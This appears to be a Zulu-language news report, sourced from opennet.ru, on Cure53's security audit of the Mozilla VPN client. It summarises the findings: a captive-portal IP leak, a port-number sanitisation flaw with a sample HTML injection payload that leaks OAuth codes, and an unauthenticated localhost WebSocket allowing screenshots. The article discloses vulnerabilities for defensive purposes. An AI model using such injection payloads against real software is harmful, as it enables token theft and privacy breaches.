I-Mozilla imemezele ukuphothulwa kocwaningomabhuku oluzimele lwesofthiwe yeklayenti yokuxhuma kusevisi ye-Mozilla VPN. Ukucwaninga kufaka phakathi ukuhlaziywa kohlelo lokusebenza lweklayenti elizimele lodwa elibhalwe kusetshenziswa umtapo wezincwadi we-Qt futhi otholakala ku-Linux, macOS, Windows, Android kanye ne-iOS. I-Mozilla VPN inikwa amandla amaseva angaphezu kuka-400 omhlinzeki we-VPN waseSweden i-Mullvad, etholakala emazweni angaphezu kuka-30. Ukuxhuma kusevisi ye-VPN kwenziwa kusetshenziswa iphrothokholi ye-WireGuard.
Ukucwaninga kwenziwa yi-Cure53, eyake yahlola amaphrojekthi we-NTPsec, SecureDrop, Cryptocat, F-Droid kanye ne-Dovecot. Ukuhlola kuhlanganisa ukuqinisekiswa kwamakhodi omthombo futhi kwafaka nokuhlola ukuze kutholakale ubungozi obungase bube khona (izinkinga ezihlobene ne-cryptography azizange zicatshangelwe). Ngesikhathi sokuhlolwa kwamabhuku, kuhlonzwe izindaba zezokuphepha eziyi-16, eziyisi-8 kuzo kube yizincomo, ezi-5 zanikezwa izinga eliphansi lengozi, ababili banikezwa izinga elimaphakathi, oyedwa wanikezwa izinga eliphezulu lobungozi.
Kodwa-ke, udaba olulodwa kuphela olunezinga lokuqina elimaphakathi olwahlukaniswa njengobungozi, njengoba bekuyilo lodwa obelusebenziseka. Le nkinga ibangele ukuvuza kolwazi lokusetshenziswa kwe-VPN kukhodi yokutholwa yephothali evalelwe ngenxa yezicelo ze-HTTP eziqondile ezingabetheliwe ezithunyelwe ngaphandle komhubhe we-VPN, okuveza ikheli le-IP eliyinhloko lomsebenzisi uma umhlaseli ekwazi ukulawula ithrafikhi yezokuthutha. Inkinga ixazululwa ngokukhubaza imodi yokutholwa kwephothali yabathunjiweyo kuzilungiselelo.
Inkinga yesibili yobukhulu obumaphakathi ihlotshaniswa nokushoda kokuhlanzwa okufanele kwamanani angewona wezinombolo ezinombolweni yembobo, okuvumela ukuvuza kwamapharamitha wokuqinisekisa we-OAuth ngokufaka inombolo yembobo ngochungechunge olufana nokuthi β[i-imeyili ivikelwe]", okuzoholela ekufakweni kwethegi ye-<img src="http://127.0.0.1:[i-imeyili ivikelwe]/?code=..." alt=""> ifinyelela ku-example.com esikhundleni se-127.0.0.1.
Udaba lwesithathu, olumakwe njengengozi, luvumela noma yiluphi uhlelo lokusebenza lwasendaweni ngaphandle kokuqinisekisa ukuthi lufinyelele iklayenti le-VPN nge-WebSocket eboshwe ku-localhost. Njengesibonelo, kuboniswa ukuthi, ngeklayenti le-VPN elisebenzayo, noma iyiphi isayithi ingahlela ukudalwa nokuthunyelwa kwesithombe-skrini ngokukhiqiza umcimbi we-screen_capture. Inkinga ayihlukaniswa njengesengozini, njengoba i-WebSocket isetshenziswe kuphela ekwakhiweni kokuhlolwa kwangaphakathi futhi ukusetshenziswa kwalesi siteshi sokuxhumana kwakuhlelwe kuphela esikhathini esizayo ukuze kuhlelwe ukusebenzisana nesengezo sesiphequluli.
Source: opennet.ru